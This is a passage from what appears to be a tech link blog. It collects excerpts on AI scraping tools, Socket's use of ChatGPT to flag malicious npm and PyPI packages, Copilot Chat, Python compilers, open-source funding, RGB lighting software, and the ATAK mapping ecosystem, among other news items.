a novel approach to the problem of scraping web content in a structured way without needing to write the kind of page-specific code web scrapers usually have to deal with. How? Just enlist the help of a natural language AI. Scrapeghost relies on OpenAI’s GPT API to parse a web page’s content, pull out and classify any salient bits, and format it in a useful way.
What makes Scrapeghost different is how data gets organized. For example, when instantiating scrapeghost one defines the data one wishes to extract. For example:
The kicker is that this format is entirely up to you! The GPT models are very, very good at processing natural language, and scrapeghost uses GPT to process the scraped data and find (using the example above) whatever looks like a name, district, party, photo, and office address and format it exactly as requested.
It’s an experimental tool and you’ll need an API key from OpenAI to use it, but it has useful features and is certainly a novel approach. There’s a tutorial and even a command-line interface, so check it out.
Several months ago, Socket, which makes a freemium security scanner for JavaScript and Python projects, connected OpenAI’s ChatGPT model (and more recently its GPT-4 model) to its internal threat feed.
The results, according to CEO Feross Aboukhadijeh, were surprisingly good. “It worked way better than expected,” he told The Register in an email. “Now I’m sitting on a couple hundred vulnerabilities and malware packages and we’re rushing to report them as quick as we can.”
Socket’s scanner was designed to detect supply chain attacks. Available as a GitHub app or a command line tool, it scans JavaScript and Python projects in an effort to determine whether any of the many packages that may have been imported from the npm or PyPI registries contain malicious code.
Aboukhadijeh said Socket has confirmed 227 vulnerabilities, all using ChatGPT. The vulnerabilities fall into different categories and don’t share common characteristics.
The Register was provided with numerous examples of published packages that exhibited malicious behavior or unsafe practices, including: information exfiltration, SQL injection, hardcoded credentials, potential privilege escalation, and backdoors.
We were asked not to share several examples as they have yet to be removed, but here’s one that has already been dealt with.
mathjs-min“Socket reported this to npm and it has been removed,” said Aboukhadijeh. “This was a pretty nasty one.”
AI analysis: “The script contains a discord token grabber function which is a serious security risk. It steals user tokens and sends them to an external server. This is malicious behavior.”
“There are some interesting effects as well, such as things that a human might be persuaded of but the AI is marking as a risk,” Aboukhadijeh added.
“These decisions are somewhat subjective, but the AI is not dissuaded by comments claiming that a dangerous piece of code is not malicious in nature. The AI even includes a humorous comment indicating that it doesn’t trust the inline comment.”
Example trello-enterprise
AI analysis: “The script collects information like hostname, username, home directory, and current working directory and sends it to a remote server. While the author claims it is for bug bounty purposes, this behavior can still pose a privacy risk. The script also contains a blocking operation that can cause performance issues or unresponsiveness.”
Aboukhadijeh explained that the software packages at these registries are vast and it’s difficult to craft rules that thoroughly plumb the nuances of every file, script, and bit of configuration data. Rules tend to be fragile and often produce too much detail or miss things a savvy human reviewer would catch.
Applying human analysis to the entire corpus of a package registry (~1.3 million for npm and ~450,000 for PyPI) just isn’t feasible, but machine learning models can pick up some of the slack by helping human reviewers focus on the more dubious code modules.
“Socket is analyzing every npm and PyPI package with AI-based source code analysis using ChatGPT,” said Aboukhadijeh.
“When it finds something problematic in a package, we flag it for review and ask ChatGPT to briefly explain its findings. Like all AI-based tooling, this may produce some false positives, and we are not enabling this as a blocking issue until we gather more feedback on the feature.”
Aboukhadijeh provided The Register with a sample report from its ChatGPT helper that identifies risky, though not conclusively malicious behavior. In this instance, the machine learning model offered this assessment, “This script collects sensitive information about the user’s system, including username, hostname, DNS servers, and package information, and sends it to an external server.”
Screenshot of ChatGPT report for Socket security scanner – Click to enlarge
What a ChatGPT-based Socket advisory looks like … Click to enlarge
According to Aboukhadijeh, Socket was designed to help developers make informed decisions about risk in a way that doesn’t interfere with their work. So raising the alarm about every install script – a common attack vector – can create too much noise. Analysis of these scripts using a large language model dials the alarm bell down and helps developers recognize real problems. And these models are becoming more capable.
Apple has quietly acquired a Mountain View-based startup, WaveOne, that was developing AI algorithms for compressing video.
Apple wouldn’t confirm the sale when asked for comment. But WaveOne’s website was shut down around January, and severalformeremployees, including one of WaveOne’s co-founders, now work within Apple’s various machine learning groups.
WaveOne’s former head of sales and business development, Bob Stankosh, announced the sale in a LinkedIn post published a month ago.
“After almost two years at WaveOne, last week we finalized the sale of the company to Apple,” Stankosh wrote. “We started our journey at WaveOne, realizing that machine learning and deep learning video technology could potentially change the world. Apple saw this potential and took the opportunity to add it to their technology portfolio.”
[…]
WaveOne’s main innovation was a “content-aware” video compression and decompression algorithm that could run on the AI accelerators built into many phones and an increasing number of PCs. Leveraging AI-powered scene and object detection, the startup’s technology could essentially “understand” a video frame, allowing it to, for example, prioritize faces at the expense of other elements within a scene to save bandwidth.
WaveOne also claimed that its video compression tech was robust to sudden disruptions in connectivity. That is to say, it could make a “best guess” based on whatever bits it had available, so when bandwidth was suddenly restricted, the video wouldn’t freeze; it’d just show less detail for the duration.
WaveOne claimed its approach, which was hardware-agnostic, could reduce the size of video files by as much as half, with better gains in more complex scenes.
[…]
Even minor improvements in video compression could save on bandwidth costs, or enable services like Apple TV+ to deliver higher resolutions and framerates depending on the type of content being streamed.
YouTube’s already doing this. Last year, Alphabet’s DeepMind adapted a machine learning algorithm originally developed to play board games to the problem of compressing YouTube videos, leading to a 4% reduction in the amount of data the video-sharing service needs to stream to users.
[…] Introduced last summer after a year-long technical trial, Copilot offers coding suggestions, though not always good ones, to developers using GitHub with supported text editors and IDEs, like Visual Studio Code.
As of last month, according to GitHub, Copilot had a hand in 46 percent of the code being created on Microsoft’s cloud repo depot and had helped developers program up to 55 percent faster.
On Wednesday, Copilot – an AI “pair programmer”, as GitHub puts it – will be ready to converse with developers ChatGPT-style in either Visual Studio Code or Visual Studio. Prompt-and-response conversations take place in an IDE sidebar chat window, as opposed to the autocompletion responses that get generated from comment-based queries in a source file.
“Copilot chat is not just a chat window,” said Dohmke. “It recognizes what code a developer has typed, what error messages are shown, and it’s deeply embedded into the IDE.”
A developer thus can highlight, say, a regex in a source file and invite Copilot to explain what the obtuse pattern matching expression does. Copilot can also be asked to generate tests, to analyze and debug, to propose a fix, or to attempt a custom task. The model can even add comments that explain source code and can clean files up like a linter.
More interesting still, Copilot can be addressed by voice. Using spoken prompts, the assistive software can produce (or reproduce) code and run it on demand. It’s a worthy accessibility option at least.
[…]
When making a pull request under the watchful eye of AI, developers can expect to find GitHub’s model will fill out tags that serve to provide additional information about what’s going on. It then falls to developers to accept or revise the suggestions.
[…]
What’s more, Copilot’s ambit has been extended to documentation. Starting with documentation for React, Azure Docs, and MDN, developers can pose questions and get AI-generated answers through a chat interface. In time, according to Dohmke, the ability to interact with documentation via a chat interface will be extended to any organization’s repositories and internal documentation.
[…]
GitHub has even helped Copilot colonize the command line, with GitHub Copilot CLI. If you’ve ever forgotten an obscure command line incantation or command flag, Copilot has you covered
RGB on your PC is cool, it’s beautiful and can be quite nuts but it’s also quite complex and trying to get it to do what you want it to isn’t always easy. This article is the result of many many reboots and much Googling.
I set up a PC with 2×3 Lian Li Unifan SL 120 (top and side), 2 Lian Li Strimmer cables (an ATX and a PCIe), a NZXT Kraken Z73 CPU cooler (with LED screen, but cooled by the Lian Li Unifan SL 120 on the side, not the NZXT fans that came with it), 2 RGB DDR5 DRAMs, an ASUS ROG Geforce 2070 RTX Super, a Asus ROG Strix G690-F Gaming wifi and a Corsair K95 RGB Keyboard.
Happy rainbow colours! It seems to default to this every time I change stuff
It’s no mean feat doing all the wiring on the fan controllers nowadays, and the instructions don’t make it much easier. Here is the wiring setup for this (excluding the keyboard)
The problem is that all of this hardware comes with it’s own bloated, janky software in order to get it to do stuff.
ASUS: Armory Crate / ASUS AURA
This thing takes up loads of memory and breaks often.
I decided to get rid of it once it had problems updating my drivers. You can still download Aura seperately (although there is a warning it will no longer be updated). To uninstall Armory Crate you can’t just uninstall everything from Add or Remove Programs, you need the uninstall tool, so it will also get rid of the scheduled tasks and a directory the windows uninstallers leave behind.
Once you install Aura seperately, it still takes an inane amount of processes, but you don’t actually need to run Aura to change the RGBs on the VGA and DRAM. Oddly enough not the motherboard itself though.
Just running AURA, not Armory Crate
You also can use other programs. Theoretically. That’s what the rest of this article is about. But in the end, I used Aura.
If you read on, it may be the case that I can’t get a lot of the other stuff to work because I don’t have Armory Crate installed. Nothing will work if I don’t have Aura installed, so I may as well use that.
Note: if you want to follow your driver updates, there’s a thread on the Republic of Gamers website that follows a whole load of them.
Problem I never solved: getting the Motherboard itself to show under Aura.
Corsiar: iCUE
Yup, this takes up memory, works pretty well, keeps updating for no apparent reason and I have to slide the switch left and right to get it to detect as a USB device quite often so the lighting works again. In terms of interface it’s quite easy to use.
Woohoo! all these processes for keyboard lighting!
It detects the motherboard and can monitor the motherboard, but can’t control the lighting on it. Once upon a time it did. Maybe this is because I’m not running the whole Armory Crate thing any more.
No idea.
Note: if you do put everything on in the dashboard, memory usage goes up to 500 MB
In fact, just having the iCUE screen open uses up ~200MB of memory.
It’s the most user friendly way of doing keyboard lighting effects though, so I keep it.
When I first started running it, it told me I needed to run it as an administrator to get a driver working. I ran it and it hung my computer at device detection. Later on it started rebooting it. After installing the underlying Asus Aura services running it ran for me. [Note: the following is for the standard 0.8 build: Once. It reboots my PC after device detection now. Lots of people on Reddit have it working, maybe it needs the Aura Crate software. I have opened an issue, hopefully it will get fixed? According to a Reddit user, this could be because “If you have armoury crate installed, OpenRGB cannot detect your motherboard, if your ram is ddr5 [note: which mine is], you’ll gonna have to wait or download the latest pipeline version”]
OK, so the Pipeline build does work and even detects my motherboard! Unfortunately it doesn’t write the setting to the motherboard, so after a reboot it goes back to rainbow. After my second attempt the setting seems to have stuck and survived the reboot. However it still hangs the computer on a reboot (everything turns off except the PC itself) and It can take quite some time to open the interface. It also sometimes does and sometimes doesn’t detect the DRAM modules. Issue opened here
Even with the interace open, the memory footprint is tiny!
Note that it saves the settings to C:\Users\razor\AppData\Roaming\OpenRGB an you can find the logs there too.
SignalRGB
This looks quite good at first glance – it detected my devices and was able to apply effects to all of them at once. Awesome! Unfortunately it has a huge memory footprint (around 600MB!) and doesn’t write the settings to the devices, so if after a reboot you don’t run SignalRGB the hardware won’t show any lighting at all, they will all be turned off.
It comes in a free tier with mostly anything you need and a paid subscription tier, which costs $4,- per month = $48,- per year! Considering what this does and the price of most of these kind of one trick pony utils (one time fee ~ $20) this is incredibly high. On Reddit the developers are aggressive in saying they need to keep developing in order to support new hardware and if you think they are charging a lot of money for this you are nuts. Also, in order to download the free effects you need an account with them.
So nope, not using this.
JackNet RGBSync
Another Open Source RGB software, I got it to detect my keyboard and not much else. Development has stopped in 2020. The UI leaves a lot to be desired.
Gigabyte RGB Fusion
Googling alternatives to Aura, you will run into this one. It’s not compatible with my rig and doesn’t detect anything. Not really too surprising, considering my stuff is all their competitor, Asus.
L-Connect 2 and 3
For the Lian Li fans and the Strimmer cables I use L-Connect 2. It has a setting saying it should take over the motherboard setting, but this has stopped working. Maybe I need Armory Crate. It’s a bit clunky (to change settings you need to select which fans in the array you want to send an effect to and it always shows 4 arrays of 4 fans, which I don’t actually have), but it writes settings to the devices so you don’t need it running in the background.
L-Connect 3 runs extremely slowly. It’s not hung, it’s just incredibly slow. Don’t know why, but could be Armory Crate related.
NZXT CAM
This you need in the background or the LED screen on the Kraken will show the default: CPU temperature only. It takes a very long time to start up. It also requires quite a bit of memory to run, which is pretty bizarre if all you want to do is show a few animated GIFs on your CPU cooler in carousel mode
Interface up on the screenRunning in the background
So, it’s shit but you really really need it if you want the display on the CPU cooler to work.
Fan Control
So not really RGB, but related, is Fan Control for Windows
Also G-helper works for fan control and gpu switching
Conclusion
None of the alternatives really works very well for me. None of them can control the Lian-Li strimmer devices and most of them only control a few of them or have prohibitive licenses attached for what they are. What is more, in order to use the alternatives, you still need to install the ASUS motherboard driver, which is exactly what I had been hoping to avoid. OpenRGB shows the most promise but is still not quite there yet – but it does work for a lot of people, so hopefully this will work for you too. Good luck and prepare to reboot… A lot!
Codon is a new “high-performance Python compiler that compiles Python code to native machine code without any runtime overhead,” according to its README file on GitHub. Typical speedups over Python are on the order of 10-100x or more, on a single thread. Codon’s performance is typically on par with (and sometimes better than) that of C/C++. Unlike Python, Codon supports native multithreading, which can lead to speedups many times higher still.
Its development team includes researchers from MIT’s Computer Science and Artificial Intelligence lab, according to this announcement from MIT shared by long-time Slashdot reader Futurepower(R): The compiler lets developers create new domain-specific languages (DSLs) within Python — which is typically orders of magnitude slower than languages like C or C++ — while still getting the performance benefits of those other languages. “We realized that people don’t necessarily want to learn a new language, or a new tool, especially those who are nontechnical. So we thought, let’s take Python syntax, semantics, and libraries and incorporate them into a new system built from the ground up,” says Ariya Shajii SM ’18, PhD ’21, lead author on a new paper about the team’s new system, Codon. “The user simply writes Python like they’re used to, without having to worry about data types or performance, which we handle automatically — and the result is that their code runs 10 to 100 times faster than regular Python. Codon is already being used commercially in fields like quantitative finance, bioinformatics, and deep learning.”
The team put Codon through some rigorous testing, and it punched above its weight. Specifically, they took roughly 10 commonly used genomics applications written in Python and compiled them using Codon, and achieved five to 10 times speedups over the original hand-optimized implementations…. The Codon platform also has a parallel backend that lets users write Python code that can be explicitly compiled for GPUs or multiple cores, tasks which have traditionally required low-level programming expertise…. Part of the innovation with Codon is that the tool does type checking before running the program. That lets the compiler convert the code to native machine code, which avoids all of the overhead that Python has in dealing with data types at runtime.
Denis Pushkarev, maintainer of the core-js library used by millions of websites, says he’s ready to give up open source development because so few people pay for the software upon which they depend.
“Free open source software is fundamentally broken,” he wrote in a note on the core-js repository. “I could stop working on this silently, but I want to give open source one last chance.”
The issue of who pays for open source software, often created or managed by unpaid volunteers, continues to be a source of friction and discontent in the coding community.
Feross Aboukhadijeh, an open source developer and CEO of security biz Socket, had a lot to say on the subject in an email to The Register:
Maintainers are the unsung heroes of the software world, pouring their hearts into creating vast amounts of value that often goes unappreciated. These unsung heroes perform critical work that enables all of modern technology to function – this is not an exaggeration. These tireless individuals dedicate themselves to writing new features, fixing bugs, answering user inquiries, improving documentation, and developing innovative new software, yet they receive almost no recognition for their efforts.
It is imperative for the commercial industry and open source community to come together and find a way to acknowledge and reward maintainers for their invaluable contributions. As long as significant personal sacrifice is a prerequisite for open source participation, we’ll continue to exclude a lot of smart and talented folks. This isn’t good for anyone.
Maintainers of packages that are not installed directly, such as core-js, which often comes along for the ride when installing other packages, have it especially hard. Reliable, error-free transitive dependencies are invisible. Therefore, the maintainers are invisible, too. Perversely, the better these maintainers do their job, the more invisible they are. No one ever visits a GitHub repository for a transitive dependency that works perfectly – there’s no reason to do so. But a developer investigating an error stack trace might visit the repository if for no other reason than to file an issue. This is the exact problem that the core-js maintainer faced.
For the large companies that get more from the free labor in open source code than they pay out in donations – if indeed they pay out – the status quo looks like a pretty good deal.
For individual developers, however, code creation and maintenance without compensation has a cost – measurable not just in financial terms, but also in social and political capital.
For Pushkarev, known as zloirock on GitHub, the situation is that core-js is a JavaScript library that’s been downloaded billions of times and used on more than half of the top 10,000 websites – but the income he receives from donations has fallen dramatically. When he started maintaining core-js full time he could count on about $2,500 per month, and that’s down to about $400 per month at present.
The post then goes on to politicise the guy who is complaining and mention some other stuff from the past – but that does not invalidate the point that many FOSS developers are creating software that businesses profit hugely off and they themselves don’t see a thing for – except random hate.
After a delay of over a year, an open source code contribution to enable the export of data from Datadog’s Application Performance Monitoring (APM) platform finally got merged on Tuesday into a collection of OpenTelemetry components.
The reason for the delay, according to John Dorman, the software developer who wrote the Datadog APM Receiver code, is that, about a year ago, Datadog asked him not to submit the software.
On February 8 last year Dorman, who goes by the name “boostchicken” on GitHub, announced that he was closing his pull request – the git term for programming code contributed to a project.
“After some consideration I’ve decided to close this PR [pull request],” he wrote. “[T]here are better ways to OTEL [OpenTelemetry] support w/ Datadog.”
Members of the open source community who are focused on application monitoring – collecting and analyzing logs, traces of app activity, and other metrics that can be useful to keep applications running – had questions, claiming that DataDog prefers to lock customers into their product.
Shortly after the post, Charity Majors, CEO of Honeycomb.io, a rival application monitoring firm, wrote a Twitter thread elaborating on the benefits of OpenTelemetry and calling out Datadog for only supporting OTEL as a one-way street.
“Datadog has been telling users they can use OTEL to get data in, but not get data out,” Majors wrote. “The Datadog OTEL collector PR was silently killed. The person who wrote it appears to have been pressured into closing it, and nothing has been proposed to replace it.”
Behavior of this sort would be inconsistent with the goals of the Cloud Native Computing Foundation’s (CNCF) OpenTelemetry project, which seeks “to provide a set of standardized vendor-agnostic SDKs, APIs, and tools for ingesting, transforming, and sending data to an Observability back-end (i.e. open source or commercial vendor).”
That is to say, the OpenTelemetry project aims to promote data portability, instead of hindering it, as is common among proprietary software vendors.
The smoking hound
On January 26 Dorman confirmed suspicions that he had been approached by Datadog and asked not to proceed with his efforts.
“I owe the community an apology on this one,” Dorman wrote in his pull request thread. “I lacked the courage of my convictions and when push came to shove and I had to make the hard choice, I took the easy way out.”
“Datadog ‘asked’ me to kill this pull request. There were other members from my organization present that let me know this answer will be a ‘ok’. I am sure I could have said no, at the moment I just couldn’t fathom opening Pandora’s Box. There you have it, no NDA, no stack of cash. I left the code hoping someone could carry on. I was willing to give [Datadog] this code, no strings attached as long as it moved OTel forward. They declined.”
He added, “However, I told them if you don’t support OpenTelemetry in a meaningful way, I will start sending pull requests again. So here we are. I feel I have given them enough time to do the right thing.”
Indeed, Dorman subsequently re-opened his pull request, which on Tuesday was merged into the repository for Open Telemetry Collector components. His Datadog ARM Receiver can ingest traces in the Datadog Trace Agent Format.
Coincidentally, Datadog on Tuesday published a blog post titled, “Datadog’s commitment to OpenTelemetry and the open source community.” It makes no mention of the alleged request to “kill [the] pull request.” Instead, it enumerates various ways in which the company has supported OpenTelemetry recently.
The Register asked Datadog for comment. We’ve not heard back.
Dorman, who presently works for Meta, did not respond to a request for comment. However, last week, via Twitter, he credited Grafana, an open source Datadog competitor, for having “formally sponsored” the work and for pointing out that Datadog “refuses to support OTEL in meaningful ways.”
“We’re still trying to make sense of what happened here; we’ll comment on it once we have a full understanding. Regardless, we are happy to review and accept any contributions which push the project forward, and this [pull request] was merged yesterday,” it said.
AI bot ChatGPT has been put to the test on a number of tasks in recent weeks, and its latest challenge comes courtesy of computer science researchers from Johannes Gutenberg University and University College London, who find(Opens in a new window) that ChatGPT can weed out errors with sample code and fix it better than existing programs designed to do the same.
Researchers gave 40 pieces of buggy code to four different code-fixing systems: ChatGPT, Codex, CoCoNut, and Standard APR. Essentially, they asked ChatGPT: “What’s wrong with this code?” and then copy and pasted it into the chat function.
On the first pass, ChatGPT performed about as well as the other systems. ChatGPT solved 19 problems, Codex solved 21, CoCoNut solved 19, and standard APR methods figured out seven. The researchers found its answers to be most similar to Codex, which was “not surprising, as ChatGPT and Codex are from the same family of language models.”
However, the ability to, well, chat with ChatGPT after receiving the initial answer made the difference, ultimately leading to ChatGPT solving 31 questions, and easily outperforming the others, which provided more static answers.
[…]
They found that ChatGPT was able to solve some problems quickly, while others took more back and forth. “ChatGPT seems to have a relatively high variance when fixing bugs,” the study says. “For an end-user, however, this means that it can be helpful to execute requests multiple times.”
For example, when the researchers asked the question pictured below, they expected ChatGPT to recommend replacing n^=n-1 with n&=n-1, but the first thing ChatGPT said was, “I’m unable to tell if the program has a bug without more information on the expected behavior.” On ChatGPT’s third response, after more prompting from researchers, it found the problem.
(Credit: Dominik Sobania, Martin Briesch, Carol Hanna, Justyna Petke)
However, when PCMag entered the same question into ChatGPT, it answered differently. Rather than needing to tell it what the expected behavior is, it guessed what it was.
Microsoft wants to know how many out-of-support copies of Office are installed on Windows PCs, and it intends to find out by pushing a patch through Microsoft Update that it swears is safe, not that you asked.
Quietly mentioned in a support post this week, update KB5021751 is targeting versions of Office “including” 2007 and 2010, both of which have been out of service for several years. Office 2013 is also being asked after as it’s due to lose support this coming April.
“This update will run one time silently without installing anything on the user’s device,” Microsoft said, followed by instructions on how to download and install the update, which Microsoft said has been scanned to ensure it’s not infected by malware.
[…]
Microsoft’s description of its out-of-support Office census update leaves much to the imagination, including whether the paragraph describing installation of the update, directly contradicting the paragraph above, is simply misplaced boilerplate language that doesn’t apply to KB5021751.
Also missing is any explanation of how the update will gather info on Office installations, whether it is collecting any other system information or what exactly will be transmitted and stored by Microsoft.
Because the nature of the update is unclear, it’s also unknown what may be left behind after it runs. Microsoft said that it is a single-run, silent process, but left off mention of traces of the update that may be left behind.
The Z-Wave Alliance, the Standards Development Organization (SDO) dedicated to advancing the smart home and Z-Wave® technology, today announced the completion of the Z-Wave Source Code project, which has been published and made available on GitHub to Alliance members.
The Z-Wave Source Code Project opens development of Z-Wave and enables members to contribute code to shape the future of the protocol under the supervision of the new OS Work Group (OSWG).
Recently, I watched a fellow particle physicist talk about a calculation he had pushed to a new height of precision. His tool? A 1980s-era computer program called FORM
[…]
Developed by the Dutch particle physicist Jos Vermaseren, FORM is a key part of the infrastructure of particle physics, necessary for the hardest calculations. However, as with surprisingly many essential pieces of digital infrastructure, FORM’s maintenance rests largely on one person: Vermaseren himself. And at 73, Vermaseren has begun to step back from FORM development. Due to the incentive structure of academia, which prizes published papers, not software tools, no successor has emerged
[…]
Since 2000, a particle physics paper that cites FORM has been published every few days, on average. “Most of the [high-precision] results that our group obtained in the past 20 years were heavily based on FORM code,” said Thomas Gehrmann, a professor at the University of Zurich.
Some of FORM’s popularity came from specialized algorithms that were built up over the years, such as a trick for quickly multiplying certain pieces of a Feynman diagram, and a procedure for rearranging equations to have as few multiplications and additions as possible. But FORM’s oldest and most powerful advantage is how it handles memory.
[…]
FORM bypasses swapping and uses its own technique. When you work with an equation in FORM, the program assigns each term a fixed amount of space on the hard disk. This technique lets the software more easily keep track of where the pieces of an equation are. It also makes it easy to bring those pieces back to main memory when they are needed without accessing the rest.
Memory has grown since FORM’s early days, from 128 kilobytes of RAM in the Atari 130XE in 1985 to 128 gigabytes of RAM in my souped-up desktop — a millionfold improvement. But the tricks Vermaseren developed remain crucial. As particle physicists pore through petabytes of data from the Large Hadron Collider to search for evidence of new particles, their need for precision, and thus the length of their equations, grows longer.
[…]
As crucial as software like FORM is for physics, the effort to develop it is often undervalued. Vermaseren was lucky in that he had a permanent position at the National Institute for Subatomic Physics in the Netherlands, and a boss who appreciated the project. But such luck is hard to come by. Stefano Laporta, an Italian physicist who developed a crucial simplification algorithm for the field, has spent most of his career without funding for students or equipment. Universities tend to track scientists’ publication records, which means those who work on critical infrastructure are often passed over for hiring or tenure.
“I have seen over the years, consistently, that people who spend a lot of time on computers don’t get a tenure job in physics,” said Vermaseren.
[…]
Without ongoing development, FORM will get less and less usable — only able to interact with older computer code, and not aligned with how today’s students learn to program. Experienced users will stick with it, but younger researchers will adopt alternative computer algebra programs like Mathematica that are more user-friendly but orders of magnitude slower. In practice, many of these physicists will decide that certain problems are off-limits — too difficult to handle. So particle physics will stall, with only a few people able to work on the hardest calculations.
In April, Vermaseren is holding a summit of FORM users to plan for the future. They will discuss how to keep FORM alive: how to maintain and extend it, and how to show a new generation of students just how much it can do. With luck, hard work and funding, they may preserve one of the most powerful tools in physics.
[…] New evidence shows that ID.me “inaccurately overstated its capacity to conduct identity verification services to the Internal Revenue Service (IRS) and made baseless claims about the amount of federal funds lost to pandemic fraud in an apparent attempt to increase demand for its identity verification services,” according to a new report from the two U.S. House of Representatives committees overseeing the government’s COVID-19 response.
The report also said that ID.me—which received $45 million in COVID relief funds from at least 25 state agencies—misrepresented the excessively long wait times it forced on people trying to claim emergency benefits like unemployment insurance and Child Tax Credit payments. Wait times for video chats were as long as 4 to 9 hours in some states.
“Not only does this violate individuals’ privacy, but the inevitable false matches associated with one-to-many recognition can result in applicants being wrongly denied desperately-needed services for weeks or even months as they try to get their case reviewed,” the letter stated.
Microsoft has started testing a new search and filtering system for the Task Manager on Windows 11. It will allow Windows users to easily search for a misbehaving app and end its process or quickly create a dump file, enable efficiency mode, and more.
“This is the top feature request from our users to filter / search for processes,” explains the Windows Insider team in a blog post. “You can filter either using the binary name, PID or publisher name. The filter algorithm matches the context keyword with all possible matches and displays them on the current page.”
You’ll be able to use the alt + F keyboard shortcut to jump to the filter box in the Task Manager, and results will be filtered into single or groups of processes that you can monitor or take action on.
This page lists design patterns for dashboard design collected to support the design and creative exploration of dashboard design. We run a dedicated workshop in March 2022 to help you applying and discussing design patterns in your work.
What are Dashboards?
Dashboards offer a curated lens through which people view large and complex data sets at a glance. They combine visual representations and other graphical embellishments to provide layers of abstraction and simplification for numerous related data points, so that dashboard viewers get an overview of the most important or relevant information, in a time efficient way. Their ability to provide insight at a glance has led to dashboards being widely used across many application domains, such as business, nursing and hospitals, public health, learning analytics, urban analytics, personal analytics, energy and more.
There are many high-level guidelines on dashboard design, including advice about visual perception, reducing information load, the use of interaction, and visualization literacy. Despite this, we know little about effective and applicable dashboard design, and about how to support rapid dashboard design.
Dashboard design is admittedly not straightforward: designers have access to numerous data streams which they can process, abstract or simplify as they see fit; they have a wide range of visual representations at their disposal; and they can structure and present these visualizations in numerous ways, to take advantage of the large screens on which they are viewed (vs. individual plots that make more economic use of space).
Such a number of choice can be overwhelming, so there is a timely need for guidance about effective dashboard design—especially as dashboards are increasingly being designed for a wider non-expert audience by a wide group of designers who may not have a background in visualization or interface design.
A federal judge in Texas has ordered the company to pay Voxer, the developer of app called Walkie Talkie, nearly $175 million as an ongoing royalty. Voxer accused Meta of infringing its patents and incorporating that tech in Instagram Live and Facebook Live.
In 2006, Tom Katis, the founder of Voxer, started working on a way to resolve communications problems he faced while serving in the US Army in Afghanistan, as TechCrunch notes. Katis and his team developed tech that allows for live voice and video transmissions, which led to Voxer debuting the Walkie Talkie app in 2011.
According to the lawsuit, soon after Voxer released the app, Meta (then known as Facebook) approached the company about a collaboration. Voxer is said to have revealed its proprietary technology as well as its patent portfolio to Meta, but the two sides didn’t reach an agreement. Voxer claims that even though Meta didn’t have live video or voice services back then, it identified the Walkie Talkie developer as a competitor and shut down access to Facebook features such as the “Find Friends” tool.
Meta debuted Facebook Live in 2015. Katis claims to have had a chance meeting with a Facebook Live product manager in early 2016 to discuss the alleged infringements of Voxer’s patents in that product, but Meta declined to reach a deal with the company. The latter released Instagram Live later that year. “Both products incorporate Voxer’s technologies and infringe its patents,” Voxer claimed in the lawsuit.
People feel like they don’t have control over their YouTube recommendations…
Our 2021 investigation into YouTube’s recommender system uncovered a range of problems on the platform: an opaque algorithm, inconsistent oversight, and geographic inequalities. We also learned that people feel they don’t have control over their YouTube experience — particularly the videos that are recommended to them.
YouTube says that people can manage their video recommendations through the feedback tools the platform offers. But do YouTube’s user controls actually work?
and our study shows that they really don’t.
[…]
In the qualitative portion of our study, we learned that people do not feel in control of their experience on YouTube, nor do they have clear information about how to curate their recommendations. Many people take a trial-and-error approach to controlling their recommendations using YouTube’s hodgepodge of options, like “Dislike,” “Not Interested,” and other buttons. It doesn’t seem to work.
[…]
we ran a randomized controlled experiment across our community of RegretsReporter participants that could directly test the effectiveness of YouTube’s user controls. We found that YouTube’s user controls somewhat influence what is recommended, but this effect is meager and most unwanted videos still slip through.
[…]
Even the most effective feedback methods prevent less than half of bad recommendations.
[…]
Our main recommendation is that YouTube should enable people to shape what they see.
YouTube’s user controls should be easy to understand and access. People should be provided with clear information about the steps they can take to influence their recommendations, and should be empowered to use those tools.
YouTube should design its feedback tools in a way that puts people in the driver’s seat. Feedback tools should enable people to proactively shape their experience, with user feedback given more weight in determining what videos are recommended.
YouTube should enhance its data access tools. YouTube should provide researchers with access to better tools that allow them to assess the signals that impact YouTube’s algorithm.
Policymakers should protect public interest researchers. Policymakers should pass and/or clarify laws that provide legal protections for public interest research.
In recent years you’ve probably seen a couple of photos of tablets and smartphones strapped to the armor of soldiers, especially US Special Forces. The primary app loaded on most of those devices is ATAK or Android Tactical Assault Kit. It allows the soldier to view and share geospatial information, like friendly and enemy positions, danger areas, casualties, etc. As a way of working with geospatial information, its civilian applications became apparent, such as firefighting and law-enforcement, so CivTAK/ATAK-Civ was created and open sourced in 2020. Since ATAK-Civ was intended for those not carrying military-issued weapons, the acronym magically become the Android Team Awareness Kit. This caught the attention of the open source community, so today we’ll dive into the growing TAK ecosystem, its quirks, and potential use cases.
Tracking firefighting aircraft in 3D space using ADS-B (Credit: The TAK Syndicate)
The TAK ecosystem includes ATAK for Android, iTAK for iOS, WinTAK for Windows, and a growing number of servers, plugins, and tools to extend functionality. At the heart of TAK lies the Cursor on Target (CoT) protocol, an XML or Protobuf-based message format used to share information between clients and servers. This can include a “target’s” location, area, and route information, sensor data, text messages, or medevac information, to name a few. Clients, like ATAK, can process this information as required, and also generate CoT data to share with other clients. A TAK client can also be a sensor node, or a simple node-Red flow. This means the TAK can be a really powerful tool for monitoring, tracking, or controlling the things around you.
Standalone tools: Checking line-of-sight and camera coverage
ATAK is a powerful mapping tool on its own. It can display and plot information on a 3D map, calculate a heading to a target, set up a geofence, and serve as a messaging app between team members. Besides using it for outdoor navigation, I’ve used two other built-in mapping features extensively. Viewshed allows you to plan wireless node locations, and check line-of-sight their line-of-sight coverage. The “sensor” (camera) markers are handy for planning coverage of CCTV installations. However, ATAK starts to truly shine when you add plugins to extend features, and link clients in a network to share information.
Networking
To allow networking between clients, you either need to set up a multicast network or a central server that all the clients connect to. A popular option for multicast communication is to set up a free ZeroTier VPN, or any other VPN. For client-server topologies, there are several open source TAK servers available that can be installed on a Raspberry Pi or any other machine, including the official TAK server that was recently open sourced on GitHub. FreeTakServer can be extended with its built-in API and optional Node-RED server, and includes an easy-to-use “zero-touch” installer. Taky, is another lightweight Python-based server. All these servers also include data package servers, for distributing larger info packs to clients.
Plugins
If an internet connection is not available where you are going, there are several off-grid networking plugins available. HAMMER acts as an audio modem to send CoTs using cheap Baofeng radios. Atak-forwarder works with LoRa-based Meshtastic radios, or you can use APRS-TAK with ham radios.
Plugins can also pull data from other sources, like ADSB data from an RTL-SDR, or the video feed and location information from a drone. Many of the currently available plugins are not open source and are only available through the TAK.gov website after agreeing to terms and conditions from the US federal government. Fortunately, this means there is a lot of space for open source alternatives to grow.
For further exploration, the team behind the FreeTAK server maintains an extensive list of TAK-related tools, plugins, info sources, and hardware.
Tips to get started
